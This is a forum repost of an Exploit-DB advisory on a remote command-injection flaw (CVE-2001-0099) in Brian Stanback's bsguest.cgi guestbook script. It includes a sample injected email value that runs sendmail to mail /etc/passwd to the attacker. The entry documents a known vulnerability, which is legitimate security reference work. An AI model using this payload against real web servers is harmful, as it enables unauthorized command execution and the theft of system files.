Exploit Brian Stanback bsguest.cgi 1.0 - Remote Command Execution

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
20524
Проверка EDB
  1. Пройдено
Автор
RIVENDELL_TEAM
Тип уязвимости
REMOTE
Платформа
CGI
CVE
cve-2001-0099
Дата публикации
2000-12-20
Код:
source: https://www.securityfocus.com/bid/2159/info

An input validation vulnerability exists in Brian Stanback's bsguest.cgi, a script designed to coordinate guestbook submissions from website visitors.

The script fails to properly filter ';' characters from the user-supplied email address collected by the script.

As a result, maliciously-formed values for this field can cause the the script to run arbitrary shell commands with the privilege level of the web server.


Attacker enters his email address as <[email protected]>

'[email protected];/usr/sbin/sendmail [email protected] < /etc/passwd',

server mails a confirmation letter along with the passwd file to the attacker.
 
Источник
www.exploit-db.com